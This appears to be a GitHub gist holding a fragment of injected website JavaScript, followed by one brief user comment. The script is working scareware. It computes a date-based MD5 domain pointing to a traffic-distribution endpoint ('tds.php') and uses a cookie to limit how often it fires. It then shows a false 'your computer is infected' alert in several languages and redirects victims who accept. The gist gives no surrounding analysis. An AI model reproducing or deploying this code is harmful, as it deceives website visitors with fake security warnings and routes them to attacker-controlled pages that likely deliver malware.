console.log('current_time: ' + current_time);
console.log('cookie_time: ' + cookie_time);
console.log('current_time - cookie_time: ' + (current_time - cookie_time));

    var day = date.getDate();
    var month = date.getMonth() + 1;
    var year = date.getFullYear();
    var d = month + '/' + year;
    var tds_url = 'http://' + md5(d) + '.pro/tds.php?subid=ce';

console.log(tds_url);

    date.setDate(date.getDate() + 1);
    document.cookie = "_alert=" + current_time + "; path=/; expires=" + date.toUTCString();

if (pause && pause > (60 * 60 * 1000) && !is_keeper) {

    var lang = navigator.languages ? navigator.languages[0] : (navigator.language || navigator.userLanguage);
    if (lang) lang = lang.substring(0, 2);
    console.log('lang: ' + lang);

    var msg = 'Your computer is infected. You have to check it with antivirus.';

    if (lang == 'es') msg = "Su navegador contiene malware. Usted tiene que instalar la herramienta de eliminación de malware Chrome.";
    if (lang == 'it') msg = "Il tuo browser contiene malware. È necessario installare strumento di rimozione malware Chrome.";
    if (lang == 'fr') msg = "Votre navigateur contient MALWARE. Vous devez installer l'outil de suppression de logiciels malveillants Chrome.";
    if (lang == 'pt') msg = "Seu navegador contém malware. Você tem que instalar o Ferramenta de remoção Chrome Malware.";
    if (lang == 'de') msg = "Ihr Browser enthält MALWARE. Sie müssen Chrome Malware Removal Tool zu installieren.";
    if (lang == 'ru') msg = "Ваш браузер содержит вредоносный код. Вы должны установить расширение для блокировки вредоносного кода.";
    if (lang == 'gr') msg = "Το πρόγραμμα περιήγησής σας περιέχει κακόβουλο λογισμικό. Θα πρέπει να εγκαταστήσετε το Chrome Malware εργαλείο αφαίρεσης.";

    if (confirm(msg)) {
        top.location.href = tds_url;
    } else {
//        window.top.location.href = 'https://browser-updates.info/s.html';
    }
}

@ofmarconi
Copy link

Today with ChatGPT it's easier to solve all this, right?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment